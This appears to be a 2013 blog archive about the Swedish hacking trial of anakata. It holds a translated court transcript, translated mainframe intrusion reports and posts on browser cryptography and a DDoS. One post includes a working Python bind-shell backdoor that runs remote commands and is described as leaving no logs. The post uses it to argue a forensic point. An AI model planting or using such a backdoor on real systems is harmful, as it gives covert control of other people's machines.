anakata’s uncontrollable computer

September 5th, 2013 by qnrq

IT security specialists working for the Swedish Security Service Department of Information Security and Preservation of Evidence in IT environments performed forensics analysis on a computer seized from GSW and made the conclusion that it would be impossible to remotely control it without leaving traces, specifically seizure 2012-0201-BG25023-26. The problem is that they are wrong. The investigation report is originally written in Swedish, my translated version can be downloaded here.

The forensics analysis was isolated to the assumption that computers can only be remotely controlled via legit remote control services, such as Terminal Services and PowerShell. The forensics analysis focused on the services mentioned by the defendant and thus bypassed the possibility that, just like Nordea’s and Logica’s computers, the seized computer might as well just have been hacked unknowingly to the defendant; equal to how Logica was undetectably hacked for at least two years.

Yesterday, when Jacob Applebaum was heard as an expert witness called by the defense, the author of the report admitted that all contents of the seized computer’s harddrive had not been analyzed and that he is not a Windows expert.

The analysis assumes that only one firewall was present in the network: Windows Firewall, despite there being records of “plastic cover belonging to router” being handed over to Swedish authorities by Cambodian authorities. The router’s model version and firmware settings are uknown as it has neither been documented nor analyzed. Apparently seizing the plastic cover was a higher priority.

In their investigation the Security Service shows that Adobe Flash Player versions 11.0r1, 11.2.d202, 11.3.r300, 11.3.r400 and 11.3.402 had full permissions in the seized computer’s Windows Firewall rules to communiate over both TCP and UDP over any port in any direction. These versions of Adobe Flash Player are vulnerable to over 100 security issues which can be exploited to execute code through so called remote code execution exploits.

The computer’s Windows Firewall also allowed the Python interpreter to, just like all the other whitelisted applications, communicate over both TCP and UDP on any port and on any network device. Without going into further details in this post, here is a simple example of how a computer can be remotely controlled without leaving traces via Python:

import socket, subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM))
# Bind to port 9999 (example) on any network device
s.bind(("", 9999))
s.listen(1)
# Accept connections from clients
conn, addr = s.accept()

# Loop forever
while 1:
  # Read command sent from client
  data = conn.recv(1024)
  # Close link if no command is received
  if not data: break
  print("[+] Connection established")
  # Execute received command
  output = subprocess.check_output(data.decode().rstrip())
  # Send output of executed command back to the client
  conn.send("OUTPUT\n------\n".encode())
  conn.send(output)

conn.close()

When running the script above it creates a socket that listens on port 9999 which accepts connections on any network device on the computer. It then waits for clients to connect to it, reads received commands, executes them and returns the command output to the client. It’s not even complicated.

As an example this is what it looks like when a client connects to the server and lists the files in the current directory:

> telnet localhost 9999
Connected to localhost.
Escape character is '^]'.
ls
OUTPUT
------
server.py

In addition, the same scenario applies to another piece of software which was both installed and fully allowed in the local firewall: Neko.

Additionally the computer had both the OpenVPN client and server software installed enabling outsiders to connect to the computer and connecting the computer to additional networks, forming a Virtual Private Network, which is a globally routed virtual LAN. By directly connecting to the computer or by connecting the computer to an existing VPN other clients in the same VPN can share local resources, like harddrive storage, across the network.

Essentially it all boils down to that it is up to the software which enables remote control functionality to save logs to the harddrive. If the programmer doesn’t explicitly write such logging functionality, like in the Python example given above, logs are simply not stored to the disk. Windows does not write every network transmitted bit to the disk and unless someone logs their own backdooring it’s not going to be detected through forensics. Neither is the Python example demonstrated above detected by antivirus software as it is performing completely normal network operations.

You can obtain my somewhat lengthy comments written on this matter here. Please keep in mind that it was written under somewhat stressed circumstances where technological facts were more prioritized than human linguistic expression and spelling.

With more than 100 possibilities to remotely control the defendant’s computer without leaving traces, counting only those circumstances that paint the environmental picture in the Security Service’s investigation, it is absurd to claim that it would be impossible to remotely control the seized computer without leaving traces.

The authorities worked around the preresquites of justice when they first seized a router’s plastic cover instead of the router itself and later focused selectively on Windows Firewall. Analyzing the plastic cover would have had the same relevance as the investigation of remote control possibilities conducted by the Swedish Security Service.

Making the possible seem impossible is easy when the defendant’s documents are locked in a secret cabin and nobody has the ability to question you, but such actions does not promote true possibilities. It seems like the investigators were biased.

Solving the browser crypto problem

July 14th, 2013 by qnrq

Many developers have worked hard to port critical cryptographic functionality to JavaScript. We all agree that there is a clear requirement in a safer world to have asymmetric crypto support in the web. Porting code to JavaScript is great for users that don’t really care about the strength but only that the data is encrypted. Those people usually believe that they do not need perfect crypto, as long as it is any form of crypto it is “good enough” for them.

There are many problems with porting cryptographic functions directly to JavaScript and we see many great ideas failing on doing things properly. JavaScript cryptography is very young when comparing its lifespan to established binary solutions, such as GnuPG, that have been audited for long. GnuPG has been around since 1999 and GPG4Browsers, now OpenPGP.js, since 2011.

Auditing JavaScript ports leads to better design and less failures in time, but even when everything has been solved some problems remain due to design. Web browsers live in a very hostile world and we systematically witness XSS vulnerabilities and 0day exploits which enable dumping critical data, like private keys, as soon as either the DOM or HTML5 local storage is accessed. We can take care of badly implemented cryptography but we can’t take care of the way that the JavaScript implemented cryptography is accessible to anything that can execute JavaScript in the correct environment. As long as cryptography is done in JavaScript this will always be a huge threat.

The users that care more about their security and privacy are demanding solutions aligned with their requirements, and JavaScript implemented cryptography is by design insecure due to the surrounding threats in its domain. These users are actively choosing not to use JavaScript ported functionality but instead continue to use their local binaries that have been around and audited for decenniums more than newborn ports. And they are completely correct in doing so, because how can we actually trust JavaScript? We are stepping over the security requirements in order to deliver working solutions faster than science can keep up with it. We are impatient and we need something to work as soon as possible, especially in modern day and age with the ongoing war against free unmonitored online communication. By doing so we bypass the most important core ideas of implemented cryptography: security and privacy.

The solution

In order to expose GnuPG functionality to the web we must create an API for it which can perform cryptographic operations with non sensitive elements, such as armored public keys and private key metadata, without exposing anything of importance. The best way of doing it and successfully integrating it into web browsers is to run a webserver locally which pre accepted remotely served content can communicate with. The most important detail is that private keys should never ever be available for the web browser but instead reside in the local GnuPG keyring which the API manipulates through the local GnuPG binary.

I came up with a solution that I named pygpghttpd which I am currently working on supporting in my OpenPGP plugin for Roundcube: rc_openpgpjs. pygpghttpd is an open source minimalistic HTTPS server written in Python. pygpghttpd exposes an API enabling GnuPG’s cryptographic functionality to be used in web browsers and other software which allows HTTP requests. pygpghttpd runs on the client’s localhost and allows calling GnuPG binaries from the user’s browser securely without exposing cryptograhically sensitive data to hostile environments. pygpghttpd bridges the required elements of GnuPG to HTTP allowing its cryptographic functionality to be called without the need to trust JavaScript based PGP/GPG ports. As pygpghttpd calls local GnuPG binaries it is also using local keyrings and relying on it entirely for strength. In short pygpghttpd is just a dummy task router between browser and GnuPG binary.

pygpghttpd acts as a HTTPS server listening on port 11337 for POST requests containing operation commands and parameters to execute. When a request is received it checks the “Origin”, or if missing the “Referer”, HTTP header to find out which domain served the content that is contacting it. It then detects if the domain is added to the “accepted_domains.txt” file by the user to ensure that it is only operational for pre accepted domains. If the referring domain is accepted it treats the request and serves the result from the local GnuPG binary to the client. In the response a Cross-origin resource sharing HTTP header is sent to inform the user’s browser that the request should be permitted. If the referring domain is missing from accepted_domains.txt the user’s browser forbids the request in accordance with the same origin security policy.

The HTTPS certificate used by pygpghttpd is self signed and is not used with the intention to enhance security since all traffic is isolated to the local network interface. It uses HTTPS to ensure that both HTTPS and HTTP delivered content can interact with it.

pygpghttpd exposes metadata for both private and public keys but only allows public keys to be exported from the local keyring. The metadata for private keys is enough for performing cryptographic actions. Complete keypairs can be generated and imported into the local keyring.

For example, generating a keypair with cURL:

curl -k –data “cmd=keygen&type=RSA&length=2048&name=Alice&[email protected]&passphrase=foobar” -H “Origin: https://accepted.domain.com” https://localhost:11337/

Or from JavaScript:

$.post("https://localhost:11337/", {
  cmd: "keygen",
  type: "RSA",
  length: "2048",
  name: "Alice",
  email: "alice\@foo.com",
  passphrase: "foobar"
}, function(data) {
  if(data == "1")
    return true;
  return false;
});

Please see the project on Github, API documentation and example for full details.

Fending off attacks

June 18th, 2013 by qnrq

Dear readers,

As you may or may not have noticed, qnrq.se was inaccessible between Friday the 14th until Monday the 17th. The site was totally unavailable for 65 hours due to a powerful DDoS attack that knocked out my host’s cluster on which the site resides (195.74.38.18). Downtime doesn’t affect me as a publisher: there is nothing here that is not backed up and I don’t intend to financially gain from the visitors of this site. Instead, it affects you as a reader. It affects your ability to access the information that is being spread through this domain. This is a serious attack on your right to access information freely. Therefor I would like to address how this situation will be handled to ensure that you can, at bare minimum, always access the content that I provide.

There are no restrictions that prevent search engines and other crawlers from accessing content published on this site. If it goes down you can always view the content through, for example, Google’s cache or the Internet Archive. I have also installed and configured Cloudflare, which caches and delivers content through their CDN even when the site is inaccessible. Please keep in mind that Cloudflare is an American company which by law has to co-operate with the NSA and similar organizations. If you wish to hide your activities on this site from such organizations then please use an anonymization service like IPredator or Tor.

Cloudflare is the first non-Swedish service which is involved in delivering content on this site since I first put it online nearly two years ago. There are no Google Analytics or similar foreign tracking you here. My host, Binero, is a Swedish company with their servers placed in Sweden. The Flattr buttons you see all over the site are served by a Swedish company with servers in Sweden. The Creeper icon in the menu on the right side is served by a Swedish server run by a group of Swedish open source fanatics. The top domain? Swedish. You get the point.

Limiting the site to be served from within the Swedish borders has always been a conscious decision. Originally publications were mostly limited to Sweden and I didn’t want my visitors’ data to be sent to a lot of fishy people I have no idea of who they are. Later the site grew in popularity and I now have almost as many international visitors as I have Swedish.

I have to both fend off attacks and ensure acceptable performance. The site is being run with a very limited budget and implementing Cloudflare seems to be the best alternative from a both financial and performance perspective. Introducing an American company into the chain isn’t exactly my dream scenario but the availability is important for me. Unfortunately this creates a conflict with users that care about their privacy, especially around America.

I hope to satisfy both the performance parts and privacy parts in different means. I have stuck to the same host, Binero, for many years now, but the way that they handled the recent DDoS is entirely unacceptable to me. I am not going to deal with a host that requires me to contact them to move my site to a cluster which is not affected by the attack by pure principle (“because it causes downtime for the already DDoSed customers”, they claimed). My attitude is that if I am paying somebody to deliver me a service then I expect them to do everything in their power to ensure that the service is delivered and not require me to walk extra miles for them and then waiting for three days for their support to react. With those conditions I would much rather have as much as possible in my control, and that’s the next phase.

I am breaking up with Binero and moving the site to a dedicated Swedish VPS. For security and other considerations I will abandon PHP on the new host and serve WordPress generated pages statically. Everything will remain the same for you as a reader in terms of accessing and reading. The positive thing is that I won’t have to deal with intrusion attempts directed at PHP and WordPress and also Cloudflare will be configured to cache the static pages so that you can access them even when my host goes offline. The negative part is that you will no longer be able to leave comments on the site, but that may be fixed sometime in the future. When the site has been migrated to the new host it will also be available through HTTPS.

I believe that this is the best solution available, please let me know if you feel otherwise by commenting on this post.

Cheers, stay critical.

The extradition (Morgan part 7)

June 17th, 2013 by qnrq

Nacka District Court has granted prosecutor Henrik Olin permissions to extradite Anakata to Denmark in accordance with the Danish order for arrest. Anakata will remain in solitary confinement until the extradition is executed. Whether Anakata is allowed contacting the outside world is up to the prosecutor, Henrik Olin, in the Swedish hacking and fraud charges.

Extradition can be executed by earliest 25th June, given that the District Court finalizes the judgement on time. Prosecutor Henrik Olin decides in co-operation with the Danish authorities when the extradition shall be executed. The District Court’s decision can be appealed to the Swedish Court of Appeal.

Morgan the Trial (part 6)

June 1st, 2013 by qnrq

Below is the translated transcription of the hearing with GSW regarding charges related to intrusions in the Nordea Bank. Original Swedish recording can be downloaded here.

Dag 5, 2013-05-31
11:00 Förhör med tilltalad GSW (åp 5-13)

OLIN: Thank you. I think Ola Salomonsson has already answered some of my questions, but I thought I would ask you to make some comments. Perhaps you would first like to say something in general about these charges.
GSW: Yes, well… I don’t know what more to say than that I don’t have anything to do with it.
OLIN: Then I would like to ask a little about… first the harddrive, point 2. On it there are traces of all kinds of datasets from Nordea, do you have any comments on that?
GSW: I’m not denying that they are there, I’m denying that I have put them there.
OLIN: Yes. And you heard my statement about these 14 different IP addresses that were relevant and the 13 direct occurrence and 14 indirect occurrences in the MacBook, point 26. A big portion of them was from the ISP Cogetel, which perhaps is a big provider in Cambodia or?
GSW: I actually don’t know that.
OLIN: No. You said earlier that you had used that ISP?
GSW: Yes exactly.
OLIN: And yes… Perhaps it’s not so easy, but do you recognize any of these IP addresses?
GSW: No. I can say that I recognize that they are from Cogetel based on the numbers they are starting with but… I don’t recognize them otherwise.
OLIN: This other Cambodian ISP, what was the name again… Maybe you know that better than I? Citylink and Digi, do you recog–
GSW: No, it’s nothing I recognize. I may have heard the names but I haven’t been a customer of them.
OLIN: Malmö Borgarskola, (inaudible) group, nothing you–
GSW: Never heard of them.
OLIN: No familiar names at all?
GSW: No.
OLIN: Returning to this Mysec content that we discussed in previous hearings. In the Mysec content, if I can express myself like that… The files connected to Mysec in your computer, there are 4 of these IP addresses that are connected to the intrusion against Nordea.
GSW: Which page?
OLIN: Oh no… Perhaps I am wrong a little bit I’m realizing, these IP addresses…
?: Which page?
OLIN: I am on page 130. Oh, okay. Sorry. I will reformulate the question. I think that you should interpret this on page 130 that after contact with Mysec and in data that they have delivered they have informed that 4 out of these 14 IP addresses connected to Cambodia have been discovered at Mysec. Do you have any comment?
GSW: I will begin by pointing out that Cogetel uses so called dynamic IP addresses, meaning the customer gets a new IP address every time he connects. So you have to look at the timestamp also.
OLIN: Yes. But you have connected to Mysec’s environment from your computer in Cambodia.
GSW: That’s correct.
OLIN: And you naturally don’t know which IP?
GSW: No.
OLIN: Especially considering they are dynamic?
GSW: Mm.
OLIN: And that your defense already answered to but I’ll ask anyway at the risk of being a bit repetitive, but regarding these transactions… these names of individuals and companies, is there anything that is familiar to you?
GSW: The first time I heard any of the names was during the interrogation on 8th March.
OLIN: The company called (inaudible)?
GSW: Never heard of it. I think on 8th March you asked about three recipients.
OLIN: During interrogations?
GSW: Exactly.
OLIN: Oh, OK. But now that you’ve heard all names you don’t have any..
GSW: No.
OLIN: No. I have no more questions, thank you.
Judge: Ola Salomonsson.
OLA: The question can seem a bit distant in relation to all these technical things… But I will begin by asking you, without going into personal things, how are you living in Cambodia during this time? How is it financially for you?
GSW: I didn’t have any financial problems. I was partially working, running a business down there.
OLA: And you had a lot of employees too?
GSW: Yes, in the previous year.
OLA: But at this time, more exactly during the summer 2012.
GSW: I was freelancing as a consultant and didn’t have any financial problems at all. I was getting money from my parents too.
OLA: Is it the same residence and same conditions as you said in earlier hearings?
GSW: Yes.
OLA: I mean with the guestroom and the computers and so forth.
GSW: Exactly.
OLA: There is no difference I think. Now… the technology isn’t so easy at least for me, but when you say that the ISP in this case had a dynamic timestamp or…
GSW: Dynamic IP address.
OLA: That’s right, dynamic IP address. What does that mean, explain a little bit.
GSW: It means that customers are assigned new IP addresses every time they connect.
OLA: OK. So that many different IP addresses are occuring…
GSW: That can both mean that one and the same computer has multiple IP addresses or that multiple computers have the same IP address. They only have it at the same time.
OLA: If we apply that on the fact that there are 14 different IP addresses here, does it have any value then?
GSW: No, not really.
OLA: No, OK. I said but perhaps it should also come from you, or perhaps that question was asked. But you didn’t recognize any of these companies…
GSW: No.
OLA: that the money has supposedly been sent to…
GSW: Nothing.
OLA: We have Iran here, now your computer might have been remotely accessed but do you have any connection there?
GSW: No, none.
OLA: Do you have any similar reflection as you had on the previous charge, a slight idea over which individual or group could be behind this?
GSW: This is closer in time so it’s easier to remember things that have happened and I have my suspicions of who could…
OLA: Is that going in the same direction as what we talked about previously?
GSW: Yes, it’s more or less the same.
OLA: More or less the same?
GSW: It’s the same.
OLA: I have thought, and of course you think a lot about this case, it’s a pretty large investigation but… I am wondering if it’s not you that is responsible for the intrusion and transactions then one can ask, and you have your suspicions, but is there anything in this material that you can point at that shows that you didn’t do it?
GSW: It’s hard to say that it’s not me except by saying that I don’t know anyone of those involved.
(OLA and GSW talking at the same time, inaudible.)
GSW: Besides that I can say that I actually had work to do and didn’t have time to sit and do these things.
OLA: Summer 2012?
GSW: Yes exactly.
OLA: Maybe it doesn’t take so long to do this but you can tell anyway, what are you doing when you are busy?
GSW: I am freelancing as a consultant doing graphical development and other…
OLA: Mm, and it was a little bit what you said earlier.
GSW: Exactly.
OLA: So to say you were active summer 2012.
GSW: Yes.
OLA: One can either way ask, since we are specifically asking about the summer 2012, even though the intrusions happened a short while before that, were you physically in Phnom Penh where the computers stood?
GSW: Yes I was.
OLA: You know that you were?
GSW: Yes.
OLA: Have you had any guests at all?
GSW: I have had many.
OLA: Even during this timeframe?
GSW: Exactly. Also people that have been living there for longer periods. I had, like I said, a pretty large apartment very centrally so people often came to the city when living somewhere else in Cambodia or were temporarily in Cambodia and lived in my apartment instead of renting a hotel room.
OLA: I asked the question to the prosecutor if the intrusions and data transfers had to be made (inaudible) is there anything in that regard that you want to inform or say?
GSW: I have nothing to do with neither the intrusions nor the data transfers so I can just generally point out that it doesn’t have to be the same person.
OLIN: One more question from my side.
JUDGE: Go ahead.
OLIN: You don’t have any obligations to prove your innocence of course, Gottfrid. But now both under this charge and the previous one you have repeated these suspicions that you have, when you’ve said one part don’t you want to say the second part and give some more information about your suspicions?
GSW: Now I will speak personally from the heart so to say. You must understand that here you come and first you talk about several years in prison. Do you know what happens to so called snitches in prison?
OLIN: It’s not my part to answer any questions right now but I understand your viewpoint.
GSW: You have to understand that I can’t expose myself to the obvious risk losing life and limb. It’s also quite large sums of money so it’s very likely that the actual offenders would go after me if I…
OLIN: So your own security is the reason why you don’t want to say anything more. I respect your answer, that’s what I wanted an answer to. Thank you.
OLA: To add on the same theme, there are even journalists that have called me, not only one but pretty many, but people are wondering a little about whether you’ve been threatened or are afraid of threats from individuals or groups, have there been any?
GSW: I haven’t received any concrete threats, no.
OLA: This with the computer world, hackers breaking into every mainframe and banks and transfer money, this can spontaneously possibly be connected to international crime and serious crime…
GSW: It’s a little bit why I brought up this with that different people can have done the hackings and transfers.
OLA: I can imagine that this is extremely organized.
GSW: Exactly.

Morgan the Trial (part 5)

May 19th, 2013 by qnrq

The trial against Anakata and his alleged co-conspirators begins tomorrow and is scheduled until the 6th June. In case you’ve missed it, WikiLeaks published all related documents today. The prosecution documents, which the Swedish government declined handing out in digital format, has thus gone fully public.

The loud voices that were panicking Cambodian authorities into deporting Gottfrid aren’t echoing in the prosecution. The alleged danger was certainly hyped; a wise tactic if the goal is to withdraw somebody from another country as fast and quietly as possible, however unwise if the authorities wished to act in accordance with their own laws.

“Sweden has donated money to Cambodia since 1979, shut up with your tinfoil fashion”, says the critic. Yes, but what amounts? Published 2009 by SIDA, Sweden originally planned to donate 241 255 000 SEK to Cambodia year 2012. In 2010 Sweden donated 24 million $USD and 25.5 million $USD in year 2011. Year 2012, the year of Gottfrid’s arrest in Cambodia, the financial aid grew with, comparing to 2011, 32.15% to 33.7 million $USD. Quite a large increase considering the 6.25% increase between 2010 and 2011. The financial aid that Cambodia received from Sweden 2012 is the largest one in history.

Of course there are other parameters to take into consideration such as economical development, but when the Cambodian Interior Minister travels to Stockholm only one week after he signed Gottfrid’s deportation order then it’s quite natural to raise questions. In fact it’s so natural that even the officials of the Swedish Ministry for Foreign Affairs are being prepared to answer to those questions and the Swedish Embassy staff is pointing out that the coincidence is an “interesting detail”. Smile and wave boys, smile and wave.

A state does not simply legally deny somebody their right to an attorney and lie to and mislead those that wish such rights to be granted. According to themselves, originally the Swedish embassy and Ministry for Foreign Affairs was insecure of whether they’d be able to retrieve Gottfrid in the first place. Fully understandable, considering the fact that upon deportation the deportee has a choice of destination and also various legal rights such as access to lawyers and court processing, things that were never optional for Gottfrid. The Swedish authorities intended to act as quickly as possible in the shadows of their own biased classifications. Us mortals are told to get with the system and stop questioning or face the never-ending troublemaker labeling.

In order to raise the panic levels the government is saying that people have been harmed in these alleged intrusions. When directly asked the Swedish tax agency couldn’t estimate if it hurt anybody. The government wrote in their statements that people with protected identities were being put at risk by the leaked so called person numbers. They are entirely public in Sweden and can’t be put to much use. The same information that was allegedly stolen from Logica’s mainframes, the tax agency data, contains information that can be retrieved by calling the tax agency and asking for it.

Swedish person numbers are no secrets, they are available anywhere and the worst thing you can do with it is change somebody’s name or address, like how someone changed the name of Antipiratbyrån’s lawyer Henrik Pontén to Pirate Pontén. Actual harm and annoyance can undoubtedly be caused by using person numbers in malicious ways, but once again they are entirely public. If it is such a big problem that people can cause harm with person numbers then why doesn’t the tax agency start, hm let’s say, verifying critical things that can be done with one’s person number to begin with? These are problems that exist far outside the hacker scope.

The alleged harm is of course made up to weigh in sync with the amount of money that the affected private companies and government agencies spent on their investigations. Not actual harm caused to individual members of the society.

It’s actually about time that something like this happened. People are always boasting about how anything can be hacked but in the end of the day very few citizens reflect on whether or not it is wise to trust the government. After all they are repeating what their trusted vendor has told them after saying what their own trusted vendor has told them, and so forth. The citizens are trusting a government to protect their data and in turn the government outsources the data to private companies which is configuring their mainframes to forbid passwords mixed with uppercase and lowercase characters and then capping them at 8 characters. Best of all, all these mainstream media articles about password policies and security? Turns out Sweden protected their tax agency datasets without any password policies. The government is just a brand used to verify multiple companies which have structures that are too complex for the average citizen to get a wide understanding of. We elect a government because we are lazy. Our own laziness is repeatedly making bad decisions for us.

The tip of Mount Problem is that these problems are everywhere. System administrators, governments and companies don’t care if your data is lost because it’s lost, they care because if you find out about it then you might choose someone else to provide you services and they’ll start losing customers and votes. Governmental trust is the lowest level of marketing because the general public trusts it to make the right decisions in most cases by default due to the governmental branding.

The biggest threat of exposing them is that they lose trust. They are not protecting you. If you aren’t protecting yourself then nobody is. Banks and governments have repeatedly proven that they will rather keep cyber attacks secret than expose them and risk losing your trust, which you have to keep in mind is what they convert into profit. The biggest threat of exposing them is that they lose trust. Keeping cyber attacks secret paradoxically benefits the attackers just as much as the government.

Now vote like it matters.

Logica, National Special Event: Morgan (part 4)

May 3rd, 2013 by qnrq

axex

0201-K81864-12 Notification Letter from Axex

Translated version of Axex’s police report for Applicate.

Contact details
2012-03-19

Reporter:
Yv*nn* W*stm*n, CEO
Infodata Applicate AB
556436-3421
Box 34101
100 26 STOCKHOLM

(The reporter requests that the report is classified if possible since publicity about the event can affect the company more than the event itself. The reporter requests to receive a copy of the report sent to them.)

CEO Yv*nn* W*stm*n describes the situation at Logica as “panicky”.
Responsible person at Logica is

J*h*n R*p*, C of Operations
Logica Sverige AB
073-xxx xx xx
He is in maximum charge of Logica’s operations in Sweden.
CEO Yv*nn* W*stm*n requests that the Security Service speaks to him if possible before he takes any panicky actions.

Introduction
Axex co-operates with Infodata Applicate AB in security related matters. The company has recently been attacked by hackers and has requested us to report the event.

Infodata Applicate AB, 556436-3421, wants to report hacking where somebody unknown has gained access and stolen information from their servers in the network.

Procedure
Somebody has illegally downloaded information from Applicate. Logica is the company that supplies Applicate infrastructure. The attack has been made through Logica’s web application and from information received they have also accessed mainframes (which requires special knowledge).
In connection with the intrusion of Infotorg’s web applications the intruders have used Monique Wadstedt’s account. She is the lawyer that representet the American entertainment companies that were one of the parties in the Pirate Bay trial. Outgoing traffic has been going to two IP adresses at an ISP called Cogetel in Phnom Penh, Cambodia, Bahnhof and Tele2 mobile connection.

During the intrusion the attckers have downloaded amongst others, social security numbers for protected identities from 2007 (without names or other information). They have also downloaded the entire SPAR database incloding historical data from 4 years back in time.
It is estimated that 1.7 Tb information has been transferred out of Applicate’s storage servers.

Description
The 3rd-4th March 2012 Applicate’s IT manager noticed increased activity and load which exceeded normal level in the mainframes which they use. The increase wasn’t dramatic and they were insecure of what the reasons were.
Pretty soon IT personnel found that there was abnormal activity in the network.

Closer investigation found that an account belonging to a sales person at Applicate had performed 1600 transactions under one hour, which is impossible to do manually. They also found abnormal searches made by the same account.
Controls showed that the owner had not been at their or somebody else’s computer with access to the system. The account owner had been in sales meetings at the point of time.

Additional studies showed traces of FTP traffic and exportation of text files which is very rare at Applicate. One could also detect that Telnet communication started against the mainframe resources which is not normal.
Applicate made the conclusion that they were attacked and that somebody had accessed their servers.

By investigating the search queries made by the compromised user account they found that the permissions for the account had been increased and that some strings included in the code for permissions could only originate from Logica.

There are also details that Logica Sweden is about to fire upp to 450 employees as a saving measure.

Applicate has also found that the attackers used one of Logica’s group manager’s user account in their office in Bromölla to gain illegal access to information.

More extensive investigations were carried out and they showed that the attackers had hacked into and stolen information from the administrative permission system RACF in the mainframe. This system contains information about circa 100 000 users. They have also downloaded information from a system called PI, where information regarding permissions also occurs. These systems are in a UNIX mainframe environment.

Applicate has in its security work decreased the 200 accounts with highest permissions that have been found in the investigations to 2 accounts.

In its security work Applicate has found that somebody used Monique Wadstedt’s account. Wadstedt has had permissions and accounts in Applicate’s web interface that the intrudors have remade and created a mainframe account with superuser permissions. The intrudors have then used this access and permission to illegally download large amounts of files.
(Monique Wadstedt was the lawyer which represented the American entertainment industry in the Pirate Bay trial).

Applicate representatives have been informed by IBM specialists (hired by Logica) that investigated Logica’s mainframes and systems and found that there were over 20 years old user accounts remaining in the permission systems.
Regarding the Police connections to Applicate’s information systems they state that the Police has its own encrypted connection between Applicate’s mainframe and the Police’s mainframes.

After a detailed review of the situation Applicate has found that somebody downloaded circa 10 000 social security numbers belonging to people that had protected identities 2007-01-29. These numbers were extracted out of the system to be put in and complete the company services that Applicate ofers. Normally only the police can access the personal information that is connected to these numbers but it is not unlikely that a user with superuser permissions would be able to access and connect this information with accurate data.

Applicate has found that there have been searches made on people living around Borlänge, Ludvika and Smedjebacken. Queries have also been made on people in other parts of the country.

Moreover it has been detected that the intrudors through searching for the organisation number of the National Police Agency have searched for vehicles owned by the National Police Agency.

Other search queries have also been made.

The intrudors have also downloaded the SPAR database which also includes historical data 4 years back in time.

Upon examining outgoing traffic Applicate can state that traffic has gone to at least two IP addresses owned by Cogetel in Phnom Penh in Cambodia. Applicate has also detected exports to IP addresses in Germany and various other countries in Europe. Information has been downloaded using ISP Bahnhof and Tele2 mobile broadband with a prepaid SIM-card.

Stockholm 2012-03-19

P*d*r Q**st

Logica, National Special Event: Morgan (part 3)

May 3rd, 2013 by qnrq

infotorg_intrusion
Translated summaries of Logica security incident reports.

Logica Status report 2010-02-19, security incident

29th January 2010

Data is tranferred over FTP, large datasets are copied to an unknown address. The user identity that was used had at the time correct permissions and a valid password. The account used the NYTTPW (NEWPW) function to retrieve a valid password.

Logica has found that this account hasn’t been modified since September 2008, as far as RACF logs go.

2nd February 2010

An unauthorized person manages to log into an account in TPX, which isn’t protected by RACF. This account can be used to take over other active sessions and the attacker has that way hijacked another users permissions fully.

Besides the unprotected account the person has had full administrative permissions in the TPX system and used it for data manipulation. Due to RACF protection it hasn’t meant any risk for systems in the background.

The unprotected user identity in TPX has been set up this way since the last installation which was made circa one year ago. This is although the first known time that somebody has used the possibility to use this account to take over another user’s session.

The data stolen from the system on the 29th January contained a list of user identities without password protection. It is possible that this information made it possible, although it hasn’t been proven. The alternative being that the attacker knew beforehand.

4th February 2010

The possibility to log into TPX without RACF control was stopped. After this date there hasn’t been any successful attempts to take over an active session in TPX.

FTP to SYS19 and SYS3

On 29th January 2010 SEMA290 logged in through FTP and started retrieving files:

2010-01-29 20:39:21 SYS3 Failed login attempt through FTP. Fails since the user is revoked.
2010-01-29 20:59:42 SYS19 Resume password made through user E484RACF using routine NYTTPW
2010-01-29 22:58:28 SYS3 Failed login attempt through FTP. Fails since the user is revoked.
2010-01-29 22:58:28 SYS3 Failed login attempt through FTP. Fails since the user is revoked.
2010-01-29 22:58:32 SYS3 Failed login attempt through FTP. Fails since the user is revoked.
2010-01-29 23:02:46 SYS19 Invalid password, FTP
2010-01-29 23:17:48 Connects through FTP and retrieves a large amount of datasets and files.
2010-01-29 23:37:39 SYS3 Failed login attempt through FTP. Fails since the user is revoked.
2010-01-29 23:38:50 Failed login attempt due to revoked user.

Tests run with FTP, mirror environment

Logins through FTP against SYS19 has been done with the following userids:

SEMA290
NIXTE22
ITP0257

Has only tested login and listing the entire master directory.

Tests run with FTP, production environment

The following userids have been tested:

WMSTOTT

Has only tested to login and listing the entire master directory.

Summary

Tests have been made in the mirror environment, SYS19, to determine what kind of info can be retrieved over FTP.

All datasets in the USS part under TSO can be listed. This reveals some information e.g. usernames even though the libraries are protected via RACF.

Conclusions

Why it could happen

Userid and the possibility to change passwords for a couple demo users becomes known by an unauthorized person. This possibility is later used to log into and gathering data from the web interface. The same userid is later used for connecting over FTP to SYS19 and gather information.

It’s possible to sign in through FTP using demo users because RACF users in the environment are automatically assigned a UID at login. UIDs are assigned to enable the user to use resources under USS (ftp, telnet, sftp, webserver etc).

User that don’t need these functions shoul not be assigned a UID.

Sine the purpose of the system is to be accessible from anywhere it is possible to login with FTP having a userid and password.

TPX logins via userid without specifying passwords has been possible due to a modified parameter in TPX. This parameter was modified in connection with the production environment being upgraded on 8th February 2009. This was reconfigured by a job ran on SYS3 and SYS19, job name ADMIN.

Report extern deliveries, 2012-03-24

7th March
Applicate and Logica discovers unusual activity in the mainframe environment. After a small group of people did a quick investigation during the night they block specific accounts in the system. In the morning the group is expanded and additional managers are notified. On the 13th March the investigation reveals that the activity has occured since the 25th February 2012.

1th March
Logica calls in IBMs internaional incident investigators and security specialist. The 19th March the picture is so clear that a police report is handed from Applicate to the Security Service.

The intrusions are partially made over existing file transfer services using the FTP function, partially via interactive logins via ordinary remote control functionality, and finally via the attackers’ own placed backdoors. The intrusions have often occurred in combination with large data retrievals from the systems. Additionally intrusinos and abuse has been done in Applicate’s web services. The abuse has amongst others consisted of unauthorized credit checks.

The investigation finds that there are two points of intrusion, like shared accounts between the mainframe partitions, which allows the attackers to access data stored on both partitions in the cases where the attackers have been lucky to retrieve one of these accounts. Which they unfortunately did.

Estimated 10000 files/datasets have been retrieved from SYS19 by unauthorized people. Estimated 600 files/datasets have been retrieved from SYS3 by unauthorized people. The files and datasets that were retrieved contain various types of company information, including a list from 2007 over social security numbers with filename “E897.SPAR.SKYDD”.

Over 120 000 accounts were retrieved from the user database RACF. Retrieval has been done of user information, by which the investigation from forgotten files could conclude that important password information was missing. However it can’t be excluded that such information has leaked. Large amounts of these accounts have been blocked or revoked. Circa 70000 active customer accounts remain today in the system as preventative actions and cleaning continues.

Specifically interesting to note regarding the accounts:

– The first account that was verified cracked and used 25th February belongs to a file transfer job from the Swedish parliament. How somebody gained access to this account is still unknown.
– One of the accounts frequently used by the attackers originally belonged to Monique Wadsted, one of the lawyers hired by the entertainment industry in the so called Pirate Bay trial.
– Multiple accounts used, including Wadsted’s, have been manipulated in the RACF database to increase permissions. The work of both the incident and the investigation continues.

Status on whether the intrusion is stopped or continues

